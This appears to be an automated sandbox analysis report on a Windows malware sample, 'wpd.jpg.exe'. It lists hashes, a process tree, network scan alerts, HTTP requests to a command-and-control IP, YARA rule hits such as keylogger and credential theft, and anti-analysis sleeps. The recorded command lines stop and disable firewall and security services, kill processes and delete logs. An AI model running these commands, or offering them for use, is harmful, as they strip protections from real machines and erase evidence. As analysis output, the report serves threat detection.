Category | Machine | Started | Completed |
---|---|---|---|
ARCHIVE | s1_win7_x6402 | June 7, 2024, 5:48 p.m. | June 7, 2024, 5:50 p.m. |
Archive wpd.jpg.exe @ sandbox.zip
Summary
Size | 8.4MB |
---|---|
Type | PE32 executable (console) Intel 80386, for MS Windows |
MD5 | 1bfe19a314dd31d6adda302f177c3b7c |
SHA1 | 37fd59aa2c2b77c8757438075138f11eaedf81b8 |
SHA256 | b63ce450e4d34d1cdd727a1a246d38167f45aeacc69d15c6922ef723e49a3cf7 |
SHA512 | b486b312f809146fbe95f121ea9d7bfc152266e5ca1a178316aafe4ca21e4a80ffa76b5c7e36758d45714439b34f7f6fa6d3ed2a599f64fd7dfe5a23d416a638 |
CRC32 | CD831527 |
ssdeep | 196608:1M6/uTeIz//QEJZe+t6SuqYTFLQmEe2r06+mVWFO5p5adyuFqAHBLgMP:l/YeIzAYe+t1uTJQddQ3Qub |
Yara | |
- cmd.exe (PID 2228): C:\Windows\system32\cmd.exe /c taskkill /f /im csrs.exe&sc start netprofm&sc config netprofm start= auto&sc start NlaSvc&sc config NlaSvc start= auto
- taskkill.exe (PID 196): taskkill /f /im csrs.exe
- sc.exe (PID 1688): sc start netprofm
- sc.exe (PID 1196): sc config netprofm start= auto
- sc.exe (PID 1728): sc start NlaSvc
- sc.exe (PID 2516): sc config NlaSvc start= auto
- cmd.exe (PID 1060): C:\Windows\system32\cmd.exe /c net stop WinNsaSrv&sc config WinNsaSrv start= disabled&sc1 stop sharedaccess&sc stop 1MpsSvc&sc config 1MpsSvc start= disabled&del *.log
- taskkill.exe (PID 3652): taskkill /im csrs.exe /f
- csrs.exe (PID 3820): csrs.exe -m 6 -t 200 -l 9999
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.102:49755 -> 192.168.57.21:1433 | 2001583 | ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection | Misc activity |
TCP 192.168.56.102:50113 -> 192.168.57.196:1433 | 2001583 | ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection | Misc activity |
TCP 192.168.56.102:50045 -> 192.168.57.127:445 | 2001569 | ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection | Misc activity |
Suricata TLS
No Suricata TLS
section | xx0 |
section | xx1 |
section | xx2 |
resource name | BIN |
resource name | TXT |
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://104.37.187.182/xpxmr.txt |
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://104.37.187.182/ok/wpd.html |
suspicious_features | Connection to IP address | suspicious_request | GET http://104.37.187.182/wpdmd5.txt |
suspicious_features | Connection to IP address | suspicious_request | GET http://104.37.187.182/wpdtest.txt |
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://104.37.187.182/ver.txt |
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://104.37.187.182/shellver.txt |
request | GET http://104.37.187.182/xpxmr.txt |
request | GET http://104.37.187.182/ok/wpd.html |
request | GET http://104.37.187.182/wpdmd5.txt |
request | GET http://104.37.187.182/wpdtest.txt |
request | GET http://104.37.187.182/ver.txt |
request | GET http://104.37.187.182/shellver.txt |
name | BIN | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e90a5c | size | 0x0001e059 |
name | TXT | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00eaeab8 | size | 0x0008d49b |
name | RT_STRING | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00f3bf54 | size | 0x00000038 |
name | RT_VERSION | language | LANG_CHINESE | filetype | COM executable for DOS | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e0c350 | size | 0x000002b8 |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\msvcm90.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\msvcr90.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\msvcp90.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\python27.dll |
cmdline | C:\Windows\system32\cmd.exe /c net stop WinNsaSrv&sc config WinNsaSrv start= disabled&sc1 stop sharedaccess&sc stop 1MpsSvc&sc config 1MpsSvc start= disabled&del *.log |
cmdline | C:\Windows\system32\cmd.exe /c taskkill /im csrs.exe /f |
cmdline | C:\Windows\system32\cmd.exe /c taskkill /f /im csrs.exe&sc start netprofm&sc config netprofm start= auto&sc start NlaSvc&sc config NlaSvc start= auto |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\Crypto.Util._counter.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\Crypto.Cipher._DES3.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\_hashlib.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\cryptography.hazmat.bindings._constant_time.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\msvcr90.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\_socket.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\select.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\Crypto.Hash._MD4.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\python27.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\msvcm90.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\msvcp90.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\_ssl.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\Crypto.Cipher._DES.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\_cffi_backend.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\Crypto.Random.OSRNG.winrandom.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\pyexpat.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\Crypto.Util.strxor.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\cryptography.hazmat.bindings._openssl.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\Crypto.Cipher._AES.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\Crypto.Hash._SHA256.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\Crypto.Cipher._ARC4.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\bz2.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\_ctypes.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37762\unicodedata.pyd |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "csrs.exe") |
section | xx2 | virtual_address | 0x005ac000 | virtual_size | 0x0085f2c0 | size_of_data | 0x0085f400 | entropy | 7.92303226230594 | description | A section with a high entropy has been found |
entropy | 0.99953363647 | description | Overall entropy of this PE file is high |
description | Create a windows service | rule | Create_Service |
description | Communications over RAW Socket | rule | Network_TCP_Socket |
description | Communication using DGA | rule | Network_DGA |
description | Match Windows Http API call | rule | Str_Win32_Http_API |
description | Take ScreenShot | rule | ScreenShot |
description | Escalate priviledges | rule | Escalate_priviledges |
description | Steal credential | rule | local_credential_Steal |
description | PWS Memory | rule | Generic_PWS_Memory_Zero |
description | Record Audio | rule | Sniff_Audio |
description | Communications over HTTP | rule | Network_HTTP |
description | Communications use DNS | rule | Network_DNS |
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection |
description | (no description) | rule | DebuggerCheck__GlobalFlags |
description | (no description) | rule | DebuggerCheck__QueryInfo |
description | (no description) | rule | DebuggerCheck__RemoteAPI |
description | (no description) | rule | DebuggerHiding__Thread |
description | (no description) | rule | DebuggerHiding__Active |
description | (no description) | rule | DebuggerException__ConsoleCtrl |
description | (no description) | rule | DebuggerException__SetConsoleCtrl |
description | (no description) | rule | ThreadControl__Context |
description | (no description) | rule | SEH__vectored |
description | (no description) | rule | Check_Dlls |
description | Checks if being debugged | rule | anti_dbg |
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert |
description | Bypass DEP | rule | disable_dep |
description | Affect hook table | rule | win_hook |
description | File Downloader | rule | Network_Downloader |
description | Match Windows Inet API call | rule | Str_Win32_Internet_API |
description | Communications over FTP | rule | Network_FTP |
description | Run a KeyLogger | rule | KeyLogger |
description | Communications over P2P network | rule | Network_P2P_Win |
cmdline | sc start NlaSvc |
cmdline | C:\Windows\system32\cmd.exe /c net stop WinNsaSrv&sc config WinNsaSrv start= disabled&sc1 stop sharedaccess&sc stop 1MpsSvc&sc config 1MpsSvc start= disabled&del *.log |
cmdline | sc config NlaSvc start= auto |
cmdline | sc start netprofm |
cmdline | sc stop 1MpsSvc |
cmdline | C:\Windows\system32\cmd.exe /c taskkill /im csrs.exe /f |
cmdline | taskkill /im csrs.exe /f |
cmdline | taskkill /f /im csrs.exe |
cmdline | sc config 1MpsSvc start= disabled |
cmdline | sc config netprofm start= auto |
cmdline | sc config WinNsaSrv start= disabled |
cmdline | net stop WinNsaSrv |
cmdline | C:\Windows\system32\cmd.exe /c taskkill /f /im csrs.exe&sc start netprofm&sc config netprofm start= auto&sc start NlaSvc&sc config NlaSvc start= auto |
host | 104.37.187.182 |
host | 139.5.177.32 |
description | wpd.jpg.exe tried to sleep 197 seconds, actually delayed analysis time by 197 seconds |
description | csrs.exe tried to sleep 1741 seconds, actually delayed analysis time by 1741 seconds |